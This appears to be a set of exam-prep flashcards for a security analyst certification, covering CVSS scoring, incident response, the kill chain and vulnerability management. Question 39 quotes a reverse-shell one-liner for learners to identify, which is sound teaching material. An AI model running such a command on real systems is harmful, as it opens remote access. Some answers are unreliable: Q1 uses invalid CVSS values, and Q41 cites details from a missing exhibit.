examtopics.com Flashcards

1
Q

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?

A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

A

A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L

AV = Attack Vector (Network, Adjacent, Local, Physical)
AC = Attack Complexity (Low, High)
PR = Privileges Required (None, Low, High)
UI = User Interaction (None, Required)
S = Scope (Unchanged, Changed)
C = Confidentiality (None, Low, High)
I = Integrity (None, Low, High)
A = Availability (None, Low, High)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

A. PAM.
B. IDS.
C. PKI.
D. DLP.

A

D. DLP.

Data loss prevention (DLP) products automate the discovery and classification of data types and enforce rules so that data is not viewed or transferred without a proper authorization.

Data loss prevention (DLP) is a tool that can prevent the exposure of PII outside of an organization by monitoring, detecting, and blocking sensitive data in motion,
in use, or at rest.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

A. Set an HttpOnly flag to force communication by HTTPS
B. Block requests without an X-Frame-Options header
C. Configure an Access-Control-Allow-Origin header to authorized domains
D. Disable the cross-origin resource sharing header

A

B. Block requests without an X-Frame-Options header

The output shows that the web application is vulnerable to clickjacking attacks, which allow an attacker to overlay a hidden frame on top of a legitimate page and trick users into clicking on malicious links. Blocking requests without an X-Frame-Options header can prevent this attack by instructing the browser to not display the page within a frame.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Which of the following items should be included in a vulnerability scan report? (Choose two.)

A. Lessons learned.
B. Service-level agreement.
C. Playbook.
D. Affected hosts.
E. Risk score.
F. Education plan.

A

D. Affected hosts.
E. Risk score.

A vulnerability report should detail identified vulnerabilities, such as missing patches, incorrect configuration settings, and weak passwords, and include the following:

  • Details regarding the type of vulnerability
  • The number of instances
  • The affected systems
  • The risk levels
  • Recommendations
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

A. A mean time to remediate of 30 days.
B. A mean time to detect of 45 days.
C. A mean time to respond of 15 days.
D. Third-party application testing.

A

A. A mean time to remediate of 30 days.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script:

Which of the following scripting languages was used in the script?

A. PowerShell.
B. Ruby.
C. Python.
D. Shell script.

A

A. PowerShell.

The script uses PowerShell syntax, such as cmdlets, parameters, variables, and comments. PowerShell is a scripting language that can be used to automate tasks and manage systems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?

A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access.
B. An on-path attack is being performed by someone with internal access that forces users into port 80.
C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80.
D. An error was caused by BGP due to new rules applied over the company’s internal routers.

A

B. An on-path attack is being performed by someone with internal access that forces users into port 80.

An on-path attack is a type of man-in-the-middle attack where an attacker intercepts and modifies network traffic between two parties. In this case, someone with internal access may be performing an on-path attack by forcing users into port 80, which is used for HTTP communication, instead of port 443, which is used for HTTPS communication. This would allow the attacker to compromise the user accounts and access the company’s internal portal.

The fact that the company’s internal portal is sometimes accessible through HTTP (port 80) and other times through HTTPS (port 443) suggests that someone with internal access is actively manipulating the network traffic.

An issue with the SSL certificate (Option A) would generally result in HTTPS not working at all, rather than it being intermittently accessible.

A web server unable to handle an increasing amount of HTTPS requests (Option C) would likely result in performance issues or server errors, but it wouldn’t selectively redirect users to HTTP.

BGP (Border Gateway Protocol) is used for routing between autonomous systems on the internet, and it generally would not cause the internal portal to switch between HTTP and HTTPS. It is more relevant to external internet routing.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:
Security Policy 1006: Vulnerability Management
1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.
2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.
3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system.
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?

A. Name: THOR.HAMMER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Internal System
B. Name: CAP.SHIELD -
CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
C. Name: LOKI.DAGGER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
External System
D. Name: THANOS.GAUNTLET -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Internal System

A

B. Name: CAP.SHIELD -
CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

A. Business continuity plan.
B. Vulnerability management plan.
C. Disaster recovery plan.
D. Asset management plan.

A

A. Business continuity plan.

Disaster recovery describes the efforts taken to restore infected systems to a safe operating state. By comparison, business continuity describes the work the organization does to keep running, manage the legal ramification of the event, keep staff employed, work with insurance companies, provide internal and external communications regarding the event and its ramifications, investigate the root cause, develop plans to prevent reoccurrence, and much more.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

A. Deploy a CASB and enable policy enforcement.
B. Configure MFA with strict access.
C. Deploy an API gateway.
D. Enable SSO to the cloud applications.

A

A. Deploy a CASB and enable policy enforcement.

A Cloud Access Security Broker (CASB) is a specialized security solution designed to provide visibility and control over the use of cloud applications and services within an organization. It helps organizations identify and manage shadow IT by monitoring and controlling access to cloud applications.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

A. CDN.
B. Vulnerability scanner.
C. DNS.
D. Web server.

A

C. DNS.

DNS Logs: DDoS attacks often involve overwhelming the DNS infrastructure to disrupt normal internet services. By reviewing DNS logs, the incident response team can identify abnormal traffic patterns, unusual queries, and potential signs of a DDoS attack targeting the organization’s DNS servers. Analyzing DNS logs can help pinpoint the attack source, the type of attack, and the affected domains.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

A. Weaponization.
B. Reconnaissance.
C. Delivery.
D. Exploitation.

A

D. Exploitation.

The Cyber Kill Chain is a framework that describes the stages of a cyberattack from reconnaissance to actions on objectives. The exploitation stage is where attackers take advantage of the vulnerabilities they have discovered in previous stages to further infiltrate a target’s network and achieve their objectives. In this case, the malicious actor has gained access to an internal network by means of social engineering and does not want to lose access in order to continue the attack. This indicates that the actor is in the exploitation stage of the Cyber Kill Chain. Official References: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?

A. Exploitation.
B. Reconnaissance.
C. Command and control.
D. Actions on objectives.

A

B. Reconnaissance.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.)

A. Beaconing.
B. Domain Name System hijacking.
C. Social engineering attack.
D. On-path attack.
E. Obfuscated links.
F. Address Resolution Protocol poisoning.

A

C. Social engineering attack.
E. Obfuscated links.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

A. Conduct regular red team exercises over the application in production.
B. Ensure that all implemented coding libraries are regularly checked.
C. Use application security scanning as part of the pipeline for the CI/CD flow.
D. Implement proper input validation for any data entry form.

A

C. Use application security scanning as part of the pipeline for the CI/CD flow.

Continuous Integration/Continuous Deployment (CI/CD) pipelines are an integral part of modern software development practices. By incorporating application security scanning into the CI/CD pipeline, vulnerabilities can be identified and addressed at various stages of development, including during the build and deployment processes.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?

A. Proprietary systems.
B. Legacy systems.
C. Unsupported operating systems.
D. Lack of maintenance windows.

A

A. Proprietary systems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

The security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?

A. An output of characters > and “ as the parameters used m the attempt.
B. The vulnerable parameter ID http://172.31.15.2/1.php?id-2 and unfiltered characters returned.
C. The vulnerable parameter and unfiltered or encoded characters passed > and “ as unsafe.
D. The vulnerable parameter and characters > and “ with a reflected XSS attempt.

A

D. The vulnerable parameter and characters > and “ with a reflected XSS attempt.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

A. Develop a call tree to inform impacted users.
B. Schedule a review with all teams to discuss what occurred.
C. Create an executive summary to update company leadership.
D. Review regulatory compliance with public relations for official notification.

A

B. Schedule a review with all teams to discuss what occurred.

One of the best actions to take after the conclusion of a security incident to improve incident response in the future is to schedule a review with all teams to discuss what occurred, what went well, what went wrong, and what can be improved. This review is also known as a lessons learned session or an after-action report. The purpose of this review is to identify the root causes of the incident, evaluate the effectiveness of the incident response process, document any gaps or weaknesses in the security controls, and recommend corrective actions or preventive measures for future incidents.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

A. Code analysis.
B. Static analysis.
C. Reverse engineering.
D. Fuzzing.

A

C. Reverse engineering.

Reverse engineering describes deconstructing software and/or hardware to determine how it is crafted. Reverse engineering’s objective is to determine how much information can be extracted from delivered software. For example, reverse engineering can sometimes extract source code, identify software methods and languages used, developer comments, variable names and types, system and web calls, and many other things. An adversary can perform reverse engineering on a software patch to identify the vulnerabilities it is crafted to fix, or an analyst can perform reverse engineering on malware to determine how it operates.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

A. Hard disk.
B. Primary boot partition.
C. Malicious files.
D. Routing table.
E. Static IP address.

A

D. Routing table.

“Evidence capture prioritizes collection activities based on the order of volatility, initially focusing on highly volatile storage. The ISOC best practice guide to evidence collection and archiving, published as tools.ietf.org/html/rfc3227, sets out the general order as follows:

CPU registers and cache memory (including cache on disk controllers, GPUs, and so on)
Contents of system memory (RAM), including the following:
Routing table, ARP cache, process table, kernel statistics
Temporary file systems/swap space/virtual memory
Data on persistent mass storage devices (HDDs, SSDs, and flash memory devices)—including file system and free space
Remote logging and monitoring data
Physical configuration and network topology
Archival media”

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

Which of the following security operations tasks are ideal for automation?

A. Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder.

B. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit.
Take mitigating actions in the firewall to block the behavior found in the logs. Follow up on any false positives that were caused by the block rules.

C. Security application user errors: Search the error logs for signs of users having trouble with the security application
Look up the user’s phone number - Call the user to help with any questions about using the application.

D. Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five. Add the domain of sender to the block list. Move the email to quarantine.

A

B. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit.
Take mitigating actions in the firewall to block the behavior found in the logs. Follow up on any false positives that were caused by the block rules.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

A. PCI Security Standards Council.
B. Local law enforcement.
C. Federal law enforcement.
D. Card issuer.

A

D. Card issuer.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

A. Mean time to detect.
B. Number of exploits by tactic.
C. Alert volume.
D. Quantity of intrusion attempts.

A

A. Mean time to detect.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?

A. The current scanners should be migrated to the cloud.
B. Cloud-specific misconfigurations may not be detected by the current scanners.
C. Existing vulnerability scanners cannot scan IaaS systems.
D. Vulnerability scans on cloud environments should be performed from the cloud.

A

B. Cloud-specific misconfigurations may not be detected by the current scanners.

Cloud-specific misconfigurations are security issues that arise from improper or inadequate configuration of cloud resources, such as storage buckets, databases, virtual machines, or containers. Cloud-specific misconfigurations may not be detected by the current scanners that are designed for on-premises environments, as they may not have the visibility or access to the cloud resources or the cloud provider’s APIs. Therefore, one of the implications that should be considered on the new hybrid environment is that cloud-specific misconfigurations may not be detected by the current scanners.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user’s workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

A. Create a timeline of events detailing the date stamps, user account hostname and IP information associated with the activities.
B. Ensure that the case details do not reflect any user-identifiable information, password protect the evidence and restrict access to personnel related to the investigation.
C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation.
D. Notify the SOC manager for awareness after confirmation that the activity was intentional.

A

B. Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

A. Agree on the goals and objectives of the plan.
B. Determine the site to be used during a disaster.
C. Demonstrate adherence to a standard disaster recovery process.
D. Identify applications to be run during a disaster.

A

A. Agree on the goals and objectives of the plan.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?

A. Testing.
B. Implementation.
C. Validation.
D. Rollback.

A

C. Validation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

The analyst reviews the following endpoint log entry:

Which of the following has occurred?

A. Registry change.
B. Rename computer.
C. New account introduced.
D. Privilege escalation.

Captured log
A

C. New account introduced.

The endpoint log entry shows that a new account named “admin” has been created on a Windows system with a local group membership of “Administrators”. This indicates that a new account has been introduced on the system with administrative privileges. This could be a sign of malicious activity, such as privilege escalation or backdoor creation, by an attacker who has compromised the system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

A. Data enrichment.
B. Security control plane.
C. Threat feed combination.
D. Single pane of glass.

A

D. Single pane of glass.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:

Which of the following choices should the analyst look at first?

A. wh4dc-748gy.lan (192.168.86.152)
B. officerckuplayer.lan (192.168.86.22)
C. imaging.lan (192.168.86.150)
D. xlaptop.lan (192.168.86.249)
E. p4wnp1_aloa.lan (192.168.86.56)

A

E. p4wnp1_aloa.lan (192.168.86.56)

The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious device on the network.
https://github.com/RoganDawes/P4wnP1_aloa

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

When starting an investigation, which of the following must be done first?

A. Notify law enforcement.
B. Secure the scene.
C. Seize all related evidence.
D. Interview the witnesses.

A

B. Secure the scene.

The first thing that must be done when starting an investigation is to secure the scene. Securing the scene involves isolating and protecting the area where the incident occurred, as well as any potential evidence or witnesses. Securing the scene can help prevent any tampering, contamination, or destruction of evidence, as well as any interference or obstruction of the investigation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

A. The lead should review what is documented in the incident response policy or plan.
B. Management level members of the CSIRT should make that decision.
C. The lead has the authority to decide who to communicate with at any t me.
D. Subject matter experts on the team should communicate with others within the specified area of expertise.

A

A. The lead should review what is documented in the incident response policy or plan.

The incident response policy or plan is a document that defines the roles and responsibilities, procedures and processes, communication and escalation protocols, and reporting and documentation requirements for handling security incidents. The lead should review what is documented in the incident response policy or plan to determine who should be communicated with and when during a security incident, as well as what information should be shared and how. The incident response policy or plan should also be aligned with the organizational policies and legal obligations regarding incident notification and disclosure.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

A. Firewall logs.
B. Indicators of compromise.
C. Risk assessment.
D. Access control lists.

A

C. Risk assessment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

A. Beaconing.
B. Cross-site scripting.
C. Buffer overflow.
D. PHP traversal.

A

A. Beaconing.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?

A. Change the display filter to ftp.active.port.
B. Change the display filter to tcp.port==20.
C. Change the display filter to ftp-data and follow the TCP streams.
D. Navigate to the File menu and select FTP from the Export objects option.

A

C. Change the display filter to ftp-data and follow the TCP streams.

By changing the display filter to “ftp-data” and then following the TCP streams, the analyst can access and view the entire data transfer, which includes the contents of the downloaded files. This method allows you to reconstruct and view the files being transferred over FTP.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

A. SLA.
B. MOU.
C. NDA.
D. Limitation of liability.

A

A. SLA.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

A. Command and control.
B. Actions on objectives.
C. Exploitation.
D. Delivery.

A

A. Command and control.

Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 enables the adversary to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels. C2 allows the adversary to maintain persistence, exfiltrate data, execute commands, deliver payloads, or spread to other systems or networks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

A. External
B. Agent-based
C. Non-credentialed
D. Credentialed

A

B. Agent-based

Agent-based vulnerability scanning involves deploying scanning agents on the target systems. These agents perform the scanning locally on each system, reducing the need for extensive network traffic because the scanning is distributed. This approach is particularly well-suited for environments with dynamic IP addresses and remote workers because it doesn’t rely on centralized scanning servers or frequent network scans.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

A. RCE
B. Reverse shell
C. XSS
D. SQL injection

A

B. Reverse shell

A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user’s system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

This command is a shell script that creates a reverse shell connection from the target system to the remote user’s system at IP address 10.1.1.1 and port 4821 using UDP protocol.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

A. Scope
B. Weaponization
C. CVSS
D. Asset value

A

B. Weaponization

Weaponization in the context of vulnerability assessment and the Common Vulnerability Scoring System (CVSS) refers to the development and availability of tools, exploits, or malware that can take advantage of a vulnerability. When a widely available exploit, such as one used to deliver ransomware, becomes accessible to attackers, it significantly increases the severity of the vulnerability. This is because the exploitability of the vulnerability is heightened, leading to a higher CVSS score.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

An analyst is reviewing a vulnerability report for a server environment with the following entries:

Which of the following systems should be prioritized for patching first?

A. 10.101.27.98
B. 54.73.225.17
C. 54.74.110.26
D. 54.74.110.228

A

D. 54.74.110.228

The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution vulnerabilities that can allow an attacker to compromise the system without any user interaction or authentication. These vulnerabilities pose a high
risk to the system and should be patched as soon as possible.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning

A

C. Agent-based scanning

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

A. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }
B. function x() { info=$(ping -c 1 $1 | awk -F “/” ’END{print $5}’) && echo “$1 | $info” }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ’{print $1} ‘).origin.asn.cymru.com TXT +short) && echo “$1 | $info” }
D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

A

D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

This shell function uses traceroute to trace the route packets take to reach the destination specified by $1. The -m 40 option specifies a maximum of 40 hops for the trace. The awk ‘END{print $1}’ part extracts the final hop from the traceroute output, and then the function echoes the destination and the info.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

A. Implement step-up authentication for administrators.
B. Improve employee training and awareness.
C. Increase password complexity standards.
D. Deploy mobile device management.

A

B. Improve employee training and awareness.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

Which of the following is the best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach?

A. Determine the sophistication of the audience that the report is meant for.
B. Include references and sources of information on the first page.
C. Include a table of contents outlining the entire report.
D. Decide on the color scheme that will effectively communicate the metrics.

A

A. Determine the sophistication of the audience that the report is meant for.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

A. Upload the binary to an air gapped sandbox for analysis.
B. Send the binaries to the antivirus vendor.
C. Execute the binaries on an environment with internet connectivity.
D. Query the file hashes using VirusTotal.

A

A. Upload the binary to an air gapped sandbox for analysis.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q

Which of the following would help to minimize human engagement and aid in process improvement in security operations?

A. OSSTMM
B. SIEM
C. SOAR
D. OWASP

A

C. SOAR

SOAR stands for security orchestration, automation, and response, which is a term that describes a set of tools, technologies, or platforms that can help streamline, standardize, and automate security operations and incident response processes and tasks. SOAR can help minimize human engagement and aid in process improvement in security operations by reducing manual work, human errors, response time, or complexity. SOAR can also help enhance collaboration, coordination, efficiency, or effectiveness of security operations and incident response teams.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

A. Avoid
B. Transfer
C. Accept
D. Mitigate

A

A. Avoid

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

A. Identify any improvements or changes in the incident response plan or procedures.
B. Determine if an internal mistake was made and who did it so they do not repeat the error.
C. Present all legal evidence collected and turn it over to iaw enforcement.
D. Discuss the financial impact of the incident to determine if security controls are well spent.

A

A. Identify any improvements or changes in the incident response plan or procedures.

This helps in strengthening the organization’s security posture and ensuring a more effective response in the future.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q

The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?

A. Single pane of glass
B. Single sign-on
C. Data enrichment
D. Deduplication

A

A. Single pane of glass

A single pane of glass provides a unified dashboard and workflow for managing multiple feeds, data sources, and tools within one interface. This allows streamlining threat intel from disparate portals into one centralized view for improved efficiency and visibility.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?

A. MITRE ATT&CK
B. Cyber Kill Cham
C. OWASP
D. STIX/TAXII

A

A. MITRE ATT&CK

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a widely used framework that provides a comprehensive matrix of known Tactics, Techniques, and Procedures (TTPs) used by various adversaries. It allows security analysts to compare and map the TTPs observed in their environment to those associated with known threat actors and groups. By using ATT&CK, analysts can gain insights into which adversaries may be responsible for specific incidents based on their TTPs, aiding in threat intelligence analysis and incident response.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q

An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?

A. Eradication
B. Recovery
C. Containment
D. Preparation

A

A. Eradication

Eradication involves the process of identifying and removing the root cause or vulnerability that led to the incident. In this case, the analyst has isolated the vulnerability and is actively removing it from the system. This step is crucial to prevent further exploitation of the same vulnerability and to ensure the incident does not recur.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

A. Isolate Joe’s PC from the network.
B. Reimage the PC based on standard operating procedures.
C. Initiate a remote wipe of Joe’s PC using mobile device management.
D. Perform no action until HR or legal counsel advises on next steps.

A

D. Perform no action until HR or legal counsel advises on next steps.

Before any technical actions are taken, it is crucial to involve HR and legal counsel to assess the situation, understand the legal implications of Joe’s actions, and determine the appropriate course. This ensures that any response is in compliance with employment laws and company policies.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?

A. Reduce the administrator and privileged access accounts.
B. Employ a network-based IDS.
C. Conduct thorough incident response.
D. Enable SSO to enterprise applications.

A

A. Reduce the administrator and privileged access accounts.

Zero trust is a security framework that assumes that threats exist both inside and outside the network. It emphasizes the principle of “least privilege,” which means that users and systems should only have the minimum level of access necessary to perform their tasks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q

